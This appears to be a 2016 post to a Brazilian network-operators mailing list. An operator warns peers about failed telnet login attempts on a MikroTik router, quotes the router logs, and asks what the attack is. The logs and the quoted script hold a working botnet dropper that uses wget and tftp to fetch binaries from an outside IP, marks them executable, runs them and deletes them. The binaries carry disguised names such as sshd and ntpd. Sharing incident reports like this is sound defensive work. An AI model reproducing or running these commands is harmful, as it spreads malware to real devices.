[GTER] Script Telnet - Aviso
Marlon Casarotto
marlon at mksnet.com.br
Wed Jun 22 10:16:42 -03 2016
Bom dia Srs.
Hoje pela manhã, deparei com alguns log no mínimo estranho, no caso
identifique em um terminal MK. O atacante usou um parâmetro completo, onde
usa o wget para download de um scrip, que por si tem vários outros wget para
outros arquivos. Gostaria de saber se alguém observou algo semelhante em
seus router, e também do pessoal mais experiente se pode dizer do que se
trata. Nesse caso era um router com porta telnet default (falha já
corrigida). Como já ocorreu com UBNT talvez alguém esteja tentando explorar
alguma falha ou outra plataforma, no meu caso não houve prejuízo, mas isso
pode servir de alerta e informação para os demais. Pode não ser nada,
massss.
Grato
Dados do IP
http://bgp.he.net/ip/69.30.214.122
Segue o LOG.
jun/22/2016 07:01:56 system,error,critical login failure for user cd /tmp ||
cd / ar/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/bins.sh;> http://69.30.214.122/bins.sh; chmod2; chmod
777 tftp2.sh; sh tftp2. from 122.52.173.152 via telnet
jun/22/2016 07:02:04 system,error,critical login failure for user cd /tmp ||
cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/bins.sh;> http://69.30.214.122/bins.sh; chmod777
bins.sh; sh bins.sh; tftp 6 from 122.52.173.152 via telnet
jun/22/2016 07:02:05 system,error,critical login failure for user
9.30.214.122 –c wget tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r
tftp2.sh -g 69.30.214.122; chmod 777 tftp2.sh; sh tftp2. from 122.52.173.152
via telnet
jun/22/2016 07:02:09 system,error,critical login failure for user sh from
122.52.173.152 via telnet
jun/22/2016 07:02:14 system,error,critical login failure for user cd /tmp ||
cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/bins.sh;> http://69.30.214.122/bins.sh; chmod777
bins.sh; sh bins.sh; tftp 6 from 122.52.173.152 via telnet
jun/22/2016 07:02:15 system,error,critical login failure for user
9.30.214.122 -cget tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r
tftp2.sh -g 69.30.214.122; chmod 777 tftp2.sh; sh tftp2. from 122.52.173.152
via telnet
E esse é o script
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/ntpd;> http://69.30.214.122/ntpd; chmod +x ntpd;
./ntpd; rm -rf ntpd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/sshd;> http://69.30.214.122/sshd; chmod +x sshd;
./sshd; rm -rf sshd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/openssh;> http://69.30.214.122/openssh; chmod +x
openssh; ./openssh; rm -rf openssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/bash;> http://69.30.214.122/bash; chmod +x bash;
./bash; rm -rf bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/tftp;> http://69.30.214.122/tftp; chmod +x tftp;
./tftp; rm -rf tftp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/wget;> http://69.30.214.122/wget; chmod +x wget;
./wget; rm -rf wget
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/cron;> http://69.30.214.122/cron; chmod +x cron;
./cron; rm -rf cron
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/ftp;> http://69.30.214.122/ftp; chmod +x ftp; ./ftp;
rm -rf ftp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/pftp;> http://69.30.214.122/pftp; chmod +x pftp;
./pftp; rm -rf pftp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/sh;> http://69.30.214.122/sh; chmod +x sh; ./sh; rm
-rf sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/%5bcpu%5d;> http://69.30.214.122/[cpu]; chmod +x
[cpu]; ./[cpu]; rm -rf [cpu]
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/apache2;> http://69.30.214.122/apache2; chmod +x
apache2; ./apache2; rm -rf apache2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
<http://69.30.214.122/telnetd;> http://69.30.214.122/telnetd; chmod +x
telnetd; ./telnetd; rm -rf telnetd
Marlon Casarotto
More information about the gter
mailing list